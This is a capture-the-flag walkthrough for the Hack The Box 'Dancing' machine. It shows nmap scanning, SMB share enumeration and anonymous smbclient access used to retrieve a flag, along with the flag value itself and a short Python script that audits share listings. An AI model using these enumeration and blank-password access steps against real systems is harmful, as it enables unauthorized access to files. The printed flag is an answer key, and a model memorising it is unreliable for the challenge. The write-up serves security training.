Solving HTB Dancing CTF: A Walkthrough Guide
What does the 3-letter acronym SMB stand for?
Server Message Block
SMB stands for “Server Message Block”. It is a communication protocol that supports file and printer sharing over a network and is used to distribute and share files between computers. It is most commonly found on Windows systems.
┌──(root㉿kali)-[/home/kali]
└─# nmap -sS -sV 10.129.1.12
Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-05 18:42 EST
Nmap scan report for 10.129.1.12
Host is up (0.066s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.81 seconds
A simple nmap scan is a good first step before working through the questions.
What port does SMB use to operate at?
445
A quick search confirms that SMB operates on port 445, which also appears in the scan above.
What is the service name for port 445 that came up in our Nmap scan?
microsoft-ds
We found it in the scan.
What is the ‘flag’ or ‘switch’ that we can use with the smbclient utility to ‘list’ the available shares on Dancing?
-L
In smbclient, the -L option lists the shares available on the target server.
How many shares are there on Dancing?
4
┌──(root㉿kali)-[/home/kali]
└─# smbclient -L 10.129.1.12
Password for [WORKGROUP\root]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
WorkShares Disk
When executing the command smbclient -L 10.129.1.12 (replace the IP address with the target IP), you can obtain the list of accessible shares on the target system, which includes names like ‘ADMIN$’, ‘C$’, ‘IPC$’, and ‘WorkShares’ along with their types.
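To make the share list easier to review, the following added example (not part of the original walkthrough) parses the table printed by smbclient -L and separates the built-in administrative shares (ADMIN$, C$, IPC$) from custom shares such as WorkShares, which are the ones an administrator should check for anonymous access. The sample listing is constructed from the output shown above.

```python
import re

# Constructed sample: the share table printed by `smbclient -L`, copied from the scan above.
SAMPLE_LISTING = """\
	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	WorkShares      Disk      
"""

# One table row: share name, share type, optional comment.
ROW_RE = re.compile(r"^\s*(\S+)\s+(Disk|IPC|Printer)\s*(.*?)\s*$")


def parse_share_listing(text):
    """Return a list of (name, type, comment) tuples from smbclient -L output."""
    shares = []
    for line in text.splitlines():
        if line.strip().startswith(("Sharename", "---")):
            continue  # skip the header and its underline
        match = ROW_RE.match(line)
        if match:
            shares.append((match.group(1), match.group(2), match.group(3)))
    return shares


def is_default_share(name):
    """True for the hidden shares Windows creates itself: ADMIN$, IPC$ and <drive>$."""
    upper = name.upper()
    return upper in {"ADMIN$", "IPC$"} or re.fullmatch(r"[A-Z]\$", upper) is not None


def audit_shares(text):
    """Return the custom shares, each with a short finding describing why it needs review."""
    findings = []
    for name, share_type, comment in parse_share_listing(text):
        if is_default_share(name):
            continue  # default shares require administrator credentials
        note = "custom share; verify it rejects blank/guest logons"
        if not comment:
            note += " (no comment set, so its purpose is undocumented)"
        findings.append((name, share_type, note))
    return findings


if __name__ == "__main__":
    for name, share_type, note in audit_shares(SAMPLE_LISTING):
        print(f"{name} [{share_type}]: {note}")
```

On the Dancing listing this reports only WorkShares, the share the walkthrough goes on to open with a blank password.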
What is the name of the share we are able to access in the end with a blank password?
WorkShares
┌──(root㉿kali)-[/home/kali]
└─# smbclient \\\\10.129.1.12\\Workshares -U ADMIN$
Password for [WORKGROUP\ADMIN$]:
Try "help" to get a list of possible commands.
smb: \>
We can access the contents of the ‘WorkShares’ share by using the smbclient command and pressing Enter at the password prompt. This share is accessible without a password and lets us explore further.
Once inside, we use the “ls” command and see what happens.
smb: \> cd James.P
smb: \James.P\> ls
. D 0 Thu Jun 3 04:38:03 2021
.. D 0 Thu Jun 3 04:38:03 2021
flag.txt A 32 Mon Mar 29 05:26:57 2021
5114111 blocks of size 4096. 1732282 blocks available
Then we move into the folders with “cd” and find the flag.
What is the command we can use within the SMB shell to download the files we find?
get
smb: \James.P\> get flag.txt
getting file \James.P\flag.txt of size 32 as flag.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \James.P\>
As we learned earlier, we cannot display the file inside the SMB shell with the “cat” command, so we pull it down to our machine with the “get” command.
Submit root flag
5f61c10dffbc77a704d76016a22f1664
┌──(root㉿kali)-[/home/kali]
└─# ls
Desktop Downloads Fullscan Pictures Templates Videos
Documents flag.txt Music Public To_agentJ.txt
┌──(root㉿kali)-[/home/kali]
└─# cat flag.txt
5f61c10dffbc77a704d76016a22f1664
We successfully solved the Dancing machine, our third machine so far. By accessing the “WorkShares” share over the SMB protocol on port 445 and downloading unencrypted files from it, I carried out critical operations that can be applied in network security and penetration testing processes. This process helped me improve my information security skills by providing the opportunity to address real-world scenarios such as identifying vulnerabilities of target systems, gaining access, and file management.
Keep adopting the “try harder” mentality, keep improving yourself until our next machine.